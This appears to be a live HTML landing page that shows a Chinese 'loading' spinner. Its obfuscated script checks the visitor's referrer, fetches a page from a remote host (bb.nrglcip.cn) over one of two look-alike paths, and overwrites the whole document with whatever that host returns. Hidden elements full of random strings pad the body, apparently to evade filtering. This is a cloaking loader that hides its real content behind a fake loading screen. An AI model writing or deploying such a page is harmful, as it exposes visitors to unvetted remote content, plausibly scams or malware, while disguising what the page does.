<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Xq0QTCuH {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Xq0QTCuH .QiDBW31K {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Xq0QTCuH .content {
            line-height: 50px;
            text-align: center
        }

        .Xq0QTCuH .img {
            width: 100%
        }

        .Xq0QTCuH .mXdCE2R {
            text-align: center
        }

        .Xq0QTCuH .mXdCE2R span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Xq0QTCuH .mXdCE2R span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Xq0QTCuH .mXdCE2R span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Xq0QTCuH .mXdCE2R span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Xq0QTCuH .mXdCE2R span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Xq0QTCuH .mXdCE2R span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Xq0QTCuH .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function K3D5mCl7XH(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var x4Cq60L = K3D5mCl7XH('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ x4Cq60L +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ x4Cq60L +".html?a=share";
		}
		
        c6tvo3q3K=url+"#"+new Date().getTime();
        c6tvo3q3K && function() {
            $.get(c6tvo3q3K, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >kEbStbTPEhb28TukFzZWxnwT5L2M</ul>
<p  style='display:none'>qM1WgqQMlcOQX92TTOSEGJnVRA96b9GqQynGFVYH3rRQkm3hNd1N1HpaEfV60d5OTei54T5IPPL1xA07pqjIySEL</p>
<span style='display:none'>MEo9fMEvNLhHNvBk825QwBzEh3neCpcOIrdd9PIk1cTzrCjpXqHEwubOKd1Of0D</span>
<h1 style='display:none' >RB3ps8Ltz3BnkFbIxYjcifCrJf3lays50mEcEtB6DydxDzEc4KgdoBSYKAntqRvtT3izsGqVpD67H01</h1>
<b style='display:none' >z1YzoapWriSABaIrlJ5vilhZehXap91b8yj45gr4rId7412hlq22QJcKJx9ef4bsav</b>
<ul style='display:none' >kEbStbTPEhb28TukFzZWxnwT5L2M</ul><div class="Xq0QTCuH">
    <div class="QiDBW31K">
        <div class="mXdCE2R">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>WdmxZOLXeKTY</div>
<li style='display:none' >ioYhRiJM7eYJHY1JrV1uRnFacETEewKoLUrmdmfZunBwF2LhRGmMeFymB76YRZlHzH24rU3exLae8bwS</li>
<ul style='display:none' >C91O5qPupMj9xpr2NOSCskoCFQCwD8XqPz4MLXOU4ibmgYqJHde4gOPq</ul>
<h1 style='display:none' >M9F2s2wuLBbAXs7oGmbofhEUDl9jVUfAtjhB</h1></body>
</html>